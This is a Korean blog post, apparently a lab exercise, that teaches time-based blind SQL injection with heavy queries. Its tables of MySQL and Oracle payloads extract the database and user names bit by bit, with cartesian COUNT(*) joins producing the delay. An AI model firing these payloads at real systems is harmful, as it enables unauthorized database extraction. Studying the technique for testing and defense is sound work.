Oh! JUN
Heavy Query Technique을 이용한 Time-Based 공격 본문
※ Heavy Query Technique
쿼리에 무거운 작업을 요청해서 딜레이 시키는 공격
| ' and (select case when 1=1 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# |
참일 때 information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5
의 개수를 카운트를 하는데 요청하는 작업이 무겁다보니 시간이 오래걸림
바로 이점을 활용해서 딜레이가 걸리면 참인거고 아니면 거짓을 판별할 수 있다.
그래서 참이면 count(*)=1은 거짓이니까 '%' and 거짓이니까 쿼리문은 거짓이되어서 게시물은 아무것도 검색되지 않는다.
거짓이면 '%' and 1=1 참이니까 쿼리문은 참이되어서 전체게시물이 검색된다.
※ TMI : from information_schema.schemata t1, information_schema.schemata t2
테이블 추가될때마다 개수가 어떻게 변할까?
infromation_schema.schmata t1의 count는 10개
information_schema.schemata t2가 추가되니까 개수가 100개로 뛴다.
본래의 컬럼에 컬럼이 추가되니까 골구로 섞일려면 본래의 데이터(10)에 본래의 데이터(10)가 중복되지 않게 교차해야한다.
#MYSQL
| MYSQL : DB 이름 | ||
| ' and (select case when ascii(substring((select database()),1,1))&1=1 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | 정상 출력 0 | DB : b□□□□ |
| ' and (select case when ascii(substring((select database()),1,1))&2=2 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | 딜레이 발생 1 | |
| ' and (select case when ascii(substring((select database()),1,1))&4=4 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | 정상 출력 0 | |
| ' and (select case when ascii(substring((select database()),1,1))&8=8 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | 정상 출력 0 | |
| ' and (select case when ascii(substring((select database()),1,1))&16=16 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | 정상 출력 0 | |
| ' and (select case when ascii(substring((select database()),1,1))&32=32 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | 딜레이 발생 1 | |
| ' and (select case when ascii(substring((select database()),1,1))&64=64 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | 딜레이 발생 1 | |
| ' and (select case when ascii(substring((select database()),1,1))&128=128 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | 정상 출력 0 | |
| 01100010 → 98 → 'b' | ||
| ...생략 | ||
| ' and (select case when ascii(substring((select database()),5,1))&1=1 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | DB : board | |
#ORACLE
| ORACLE : user 이름 | ||
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),1)=1 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 1 | user : C□□□□□□□□□□□□□ |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),2)=2 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 1 | |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),4)=4 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 0 | |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),8)=8 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 0 | |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),16)=16 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 0 | |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),32)=32 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 0 | |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),64)=64 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 1 | |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),128)=128 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 0 | |
| 01000011 → 67→ 'C' | ||
| ...생략 | ||
| ' and (select case when BITAND(ascii(substr((select user from dual),14,1)),128)=128 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | user : C##CREHACKTIVE | |
'웹 해킹 > SQL Injection' 카테고리의 다른 글
| Multiple Search Technique-3 공격 실습(Content-Based SQL Injection + Response-Based SQL Injection) (0) | 2022.09.24 |
|---|---|
| Multiple Search Technique - 1 공격 실습 (0) | 2022.09.24 |
| Time-Based SQL Injection 공격 실습 (0) | 2022.09.19 |
| ORDER BY 구문에 대한 SQL Injection 공격 (0) | 2022.09.18 |
| Response-Based SQL Injection 공격 실습 (0) | 2022.09.17 |
'웹 해킹/SQL Injection' Related Articles
more
